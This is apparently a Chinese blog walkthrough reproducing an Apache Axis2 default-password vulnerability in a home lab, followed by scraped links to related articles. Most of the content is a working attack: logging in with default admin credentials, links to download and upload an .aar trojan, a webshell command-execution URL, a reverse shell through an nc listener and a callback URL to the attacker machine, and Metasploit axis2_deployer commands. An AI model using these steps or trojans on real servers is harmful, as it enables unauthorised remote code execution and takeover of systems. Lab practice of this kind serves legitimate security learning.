axis2弱密码漏洞复现
介绍
Axis2 Web 管理模块是一个下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中。
环境介绍
主机 | IP |
---|---|
靶机 | 192.168.30.134 |
kali | 192.168.30.128 |
靶机
链接:https://pan.baidu.com/s/1oz8LrApwYolS2orgJCT8yw
提取码:1234
发现漏洞
使用扫描器发现漏洞,发现可以利用
开始复现
使用admin和默认密码登陆axis2。
发现漏洞上传点。
aar木马下载:
链接:https://pan.baidu.com/s/1_z6BQay90_TA1yURO9_z3A
提取码:1234
上传木马文件
执行命令
http://192.168.30.134/axis2/services/Cat/exec?cmd=ifconfig
反弹shell
使用nc监听端口1111
nc -lvp 1111
使用命令进行反弹shell
http://192.168.30.134/axis2/services/Cat/shell?host=192.168.30.128&port=1111
Meterpreter复现
msfconsole
use exploit/multi/http/axis2_deployer
msf6 exploit(multi/http/axis2_deployer) > set rhosts 192.168.30.134
msf6 exploit(multi/http/axis2_deployer) > set rport 80
msf6 exploit(multi/http/axis2_deployer) > exploit
axis2弱密码漏洞复现相关推荐
- Tomcat 弱口令漏洞复现
目录 漏洞介绍 弱口令 弱口令的危害 靶场部署 设备信息 靶场搭建 漏洞复现 访问主页 访问默认后台地址 抓包获取加密格式 使用BurpSuite爆破使用base64加密的用户名和密码 使用冰蝎连接 ...
- tomcat8弱口令漏洞复现与getshell
目录 一.环境搭建 1.下载vulhub 2.启动环境 二.漏洞复现 1.使用默认用户名密码tomcat:tomcat登录http://your-ip:8080/manager/html 2.上传we ...
- 东方通中间件弱密码漏洞检测方法
1.东方通中间件的默认管理端口为9060,可以采用扫描工具扫出一个IP范围内9060端口的IP地址. 2.更进一步,可以访问所有开放的端口: http://ip:port/console/ 如果 ...
- DebeCMS环境搭建以及漏洞复现
文章目录 前言 一.环境搭建 首页访问慢解决方案 二.漏洞分析以及复现 任意修改前台用户密码 cookie伪造任意前台用户登录 前台文件上传漏洞 任意重置后台用户密码 后台任意 ...
- vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...
文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...
- MySQL弱密码和webshell
MySQL弱密码和webshell问题文档 一.了解漏洞 1.mysql是什么 MySQL 是最流行的关系型数据库管理系统,在 WEB 应用方面 MySQL 是最好的 RDBMS(Relational ...
- SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
- Apache Axis2 后台文件上传getshell 漏洞复现
0x00 前言 Apache Axis2是一个Web服务的核心支援引擎.AXIS2对旧有的AXIS重新设计及重写,并提供两种语言Java及C的开发版本. 事实上AXIS2 不只为WEB应用程序提供We ...
- DeDeCMS v5.7 SP2正式版 前台任意用户密码修改 漏洞复现
漏洞限制 1. 只影响前台账户 2. 只能修改未设置安全问题的账户. 影响版本 DeDeCMSV5.7SP2正式版(2018-01-09) 复现环境及工具 ⒈环境 PHP 5.6 DeDeCMSV5. ...
- DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现
DeDeCMS v5.7 SP2 前台任意用户密码修改漏洞复现 一.漏洞概述 1.简介 织梦内容管理系统(DedeCms) [1] 以简单.实用.开源而闻名,是国内最知名的 PHP 开源网站管理系统, ...
最新文章
- 【并行计算-CUDA开发】从零开始学习OpenCL开发(一)架构
- Centos7安装Python3.6
- Oracle入门(十四.22)之创建DDL和数据库事件触发器
- Windows与Linux下进程间通信技术比较
- 8个最高效的Python爬虫框架,你用过几个?
- [算法 笔记]2014年去哪儿网 开发笔试(续)第一题BUG修正
- 2怎么开机_MacBook如何取消开盖自动开机
- MyEclipse6.5注册码(转)
- c语言内循环外循环怎么使用,开高速, 用内循环还是外循环? 教你正确使用内外循环!...
- 突然想起来几年前我写的 !
- 从物理页面的争抢看linux内核内存管理
- colmap 稀疏重建输出的cameras.txt, images.txt,points3D.txt含义
- java中laber字体颜色设置,QLabel:设置文本和背景的颜色
- 田野调查手记·浮山摩崖石刻(十四)
- js破解 X笔网登录
- M1 芯片版 Mac 抹掉重装系统教程
- 和平精英修改服务器内存,和平精英极限帧率怎么调 极限帧率修改攻略[多图]
- TypeError: an integer is required (got type bytes)
- 数据库同步有哪些方式?【怎么保障目标和源数据一致性】
- 实现类似IE的松散耦合(Loosely-Coupled )效果——Window Tabifier